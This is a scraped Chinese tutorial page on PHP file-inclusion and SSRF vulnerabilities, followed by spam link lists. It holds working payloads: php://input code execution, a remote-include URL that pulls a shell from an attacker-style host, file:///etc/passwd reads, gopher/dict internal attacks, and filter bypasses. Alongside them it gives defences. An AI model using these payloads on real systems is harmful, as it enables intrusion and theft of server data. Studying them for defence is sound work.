当前位置: 首页 > wzjs >正文

科技 响应式网站模板南宁手机模板建站

科技 响应式网站模板,南宁手机模板建站,山东免费网络推广工具,低代码开发会废了程序员吗深入理解PHP安全漏洞:文件包含与SSRF攻击全解析 前言 在Web安全领域,PHP应用程序的安全问题一直备受关注。本文将深入探讨两种常见的PHP安全漏洞:文件包含漏洞和服务器端请求伪造(SSRF),帮助开发者理解漏洞原理、利用方式以及防…

深入理解PHP安全漏洞:文件包含与SSRF攻击全解析

前言

在Web安全领域,PHP应用程序的安全问题一直备受关注。本文将深入探讨两种常见的PHP安全漏洞:文件包含漏洞和服务器端请求伪造(SSRF),帮助开发者理解漏洞原理、利用方式以及防御措施。

第一部分:文件包含漏洞详解

什么是文件包含漏洞?

文件包含漏洞是PHP应用程序中常见的安全问题,当开发者使用包含函数引入文件时,如果传入的文件名参数未经严格校验,攻击者就可能利用这个漏洞读取敏感文件甚至执行恶意代码。

危险函数

PHP中有四个主要的文件包含函数:

  • include()
  • include_once()
  • require()
  • require_once()

文件包含漏洞类型

1. 本地文件包含(LFI)

利用方式:

  • 直接读取Flag文件
  • 通过PHP伪协议读取源代码
  • 写入PHP木马获取webshell

示例代码:

<?php
$file = $_GET['file'];
if(file_exists('/home/www/'.$file.'.php')) {include '/home/www/'.$file.'.php';
} else {include '/home/www/'.'home.php';
}
?>

利用方法:

http://www.example.com/demo1.php?file=flag.php%00
2. PHP伪协议利用

常用伪协议:

  1. file:// 协议:
http://www.example.com/index.php?file=file://D:/phpStudy/WWW/flag.txt
  1. php://filter
http://example.com/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
  1. php://input
POST /index.php?file=php://input HTTP/1.1
...
<?php system('id'); ?>
3. 远程文件包含(RFI)

必要条件:

  • allow_url_fopen = On
  • allow_url_include = On

示例代码:

<?php
$basePath = @$_GET['param'];
require_once $basePath.'/action/m_share.php';
?>

利用方法:

http://www.example.com/demo4.php?param=http://www.xx.com/attacker/PHPshell.txt?

防御措施

  1. 白名单验证
  2. 禁用危险配置:
    allow_url_fopen = Off
    allow_url_include = Off
    
  3. 设置open_basedir
  4. 严格校验用户输入
  5. 避免动态包含

第二部分:SSRF漏洞深入解析

什么是SSRF?

SSRF(Server-Side Request Forgery)是一种由攻击者构造形成由服务端发起请求的安全漏洞。攻击者可以利用此漏洞访问外网无法访问的内部系统。

常见危险函数

  1. file_get_contents()
<?php
if (isset($_POST['url'])) {$content = file_get_contents($_POST['url']);$filename = '/images/'.rand().'img1.jpg';file_put_contents($filename, $content);echo $_POST['url'];$img = "<img src=\"".$filename."\"/>";echo $img;
}
?>
  1. fsockopen()
<?php
function GetFile($host, $port, $link) {$fp = fsockopen($host, intval($port), $errno, $errstr, 30);if (!$fp) {echo "$errstr (error number $errno) \n";} else {$out = "GET $link HTTP/1.1\r\n";$out .= "Host: $host\r\n";$out .= "Connection: Close\r\n\r\n";$out .= "\r\n";fwrite($fp, $out);$contents = '';while (!feof($fp)) {$contents .= fgets($fp, 1024);}fclose($fp);return $contents;}
}
?>
  1. curl_exec()
<?php
if (isset($_POST['url'])) {$link = $_POST['url'];$curlobj = curl_init();curl_setopt($curlobj, CURLOPT_POST, 0);curl_setopt($curlobj, CURLOPT_URL,$link);curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);$result = curl_exec($curlobj);curl_close($curlobj);$filename = './curled/'.rand().'.txt';file_put_contents($filename, $result);echo $result;
}
?>

SSRF绕过技巧

1. IP编码绕过
  • 使用xip.io域名:
    10.0.0.1.xip.io
    
  • IP转换为10进制
2. 协议变换
  • Dict协议:
    dict://192.168.1.1:8080/test:dict
    
  • Gopher协议:
    gopher://192.168.1.1/gopher
    
  • File协议:
    file:///etc/passwd
    
3. Gopher协议高级利用

Gopher协议可以攻击内网的多种服务:

  • FTP
  • Telnet
  • Redis
  • Memcache

Redis攻击示例:

<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET["url"]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
curl_close($ch);
?>
4. filter_var()绕过
<?php
$url = $_GET['url'];
echo "Argument: ".$url. "\n";
if(filter_var($url, FILTER_VALIDATE_URL)) {$r = parse_url($url);var_dump($r);if (preg_match('/skysec\.top$/', $r['host'])) {exec("curl -v -s ".$r['host']."", $a);} else {echo "Error: Host not allowed";}
} else {echo "Error: Invalid URL";
}
?>

绕过方法:

http://example.com/test.php?url=0://192.168.1.1.com:8080;skysec.top:80/
5. 30x跳转绕过
<?php
$url = $_GET['url'];
print $url;
curl($url);
function curl($url) {$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_exec($ch);curl_close($ch);
}

防御SSRF的最佳实践

  1. 限制协议:只允许HTTP和HTTPS
  2. 禁止访问内网IP
  3. 设置URL白名单
  4. 禁用CURLOPT_FOLLOWLOCATION
  5. 使用DNS解析结果校验
  6. 过滤返回信息

结语

文件包含和SSRF漏洞都可能对Web应用造成严重威胁。作为开发者,理解这些漏洞的原理和利用方式,才能更好地防御它们。安全是一个持续的过程,需要开发者保持警惕并不断更新知识。

免责声明:本文所有技术内容仅用于教育目的和安全研究,未经授权对他人系统进行测试属于违法行为。


文章转载自:

http://Cm3Zftcf.wLqbr.cn
http://BQ7F7Bkn.wLqbr.cn
http://TB7SbPOH.wLqbr.cn
http://7vObh5nA.wLqbr.cn
http://lT909bcw.wLqbr.cn
http://B0wXQw1Y.wLqbr.cn
http://eKRiPIAg.wLqbr.cn
http://dfdC69Cy.wLqbr.cn
http://ltlXaNj2.wLqbr.cn
http://d6rYPMWf.wLqbr.cn
http://jGGI6F3Q.wLqbr.cn
http://FojOjeDY.wLqbr.cn
http://3CPQDX2X.wLqbr.cn
http://CyjAYHcE.wLqbr.cn
http://YUx19KOr.wLqbr.cn
http://fW5SVMdw.wLqbr.cn
http://QaPp1s32.wLqbr.cn
http://SCVdA1pL.wLqbr.cn
http://oE1mJt1w.wLqbr.cn
http://IiDjpEGY.wLqbr.cn
http://xdi1cZfj.wLqbr.cn
http://KAqZzfFj.wLqbr.cn
http://IBqft9ys.wLqbr.cn
http://1OqaXf2S.wLqbr.cn
http://Nm0Ifr0K.wLqbr.cn
http://NSMrU5Am.wLqbr.cn
http://zM3bSHCK.wLqbr.cn
http://dDvPO60R.wLqbr.cn
http://yvf4FDhG.wLqbr.cn
http://NrQDD4W3.wLqbr.cn
http://www.dtcms.com/wzjs/655189.html

相关文章:

  • 河南怎么样做网站制作网页时用的最多的是
  • 广州建站快车跨境电商个人可以开店吗
  • 国际网站怎么样做购物网站建设方案ppt
  • 最贵网站建设网站开发者模式下载视频教程
  • 大学网站html模板下载网站设计步骤ppt
  • 婚庆影楼型网站开发做网站需要数据库吗
  • 华为网站建设策划书怎样建设影视网站
  • 建设网站资料在哪收集找产品厂家用哪个app
  • 购物网站建设模板图片羽毛球赛事重播
  • 厦门做网站优化哪家好如何做网站的内容
  • 数字营销 h5 网站开发安康做网站哪家好
  • 解除网站开发合同 首付款是否退云服务器怎么建设网站
  • 上海网站建设推广服务教育类网站如何做
  • 网站空间域名续费如何使用seo进行综合查询
  • 四川和城乡建设厅网站一级a做爰片免费网站孕交视频
  • 人才网站查询档案wordpress英文主题适合小白用吗
  • 洛阳网站建设价格低做淘宝素材网站哪个好用
  • 网站禁止访问DW怎么做招聘网站
  • 网站流量消耗计算网站开发亿玛酷信赖
  • 莆田网站建设平台项目计划书如何写
  • 想要做网站的企业市政道路毕业设计代做网站
  • 早厦门构网站建设凡科快图app怎么下载
  • 沙田网站建设wordpress弹窗
  • 怎么把dw做的网站分享给别网站 建设 内容
  • 静宁网站建设可口可乐软文范例
  • 360网站建设价位聊城网站建设哪家专业
  • 模板网站建设多少钱沈阳网站关键词优化多少钱
  • 免费发布网站建设信息百度竞价推广账户优化
  • 做舞台灯光的在哪些网站接订单呢建网页服务公司
  • 江苏网站设计方案怎么查网站是哪个公司做的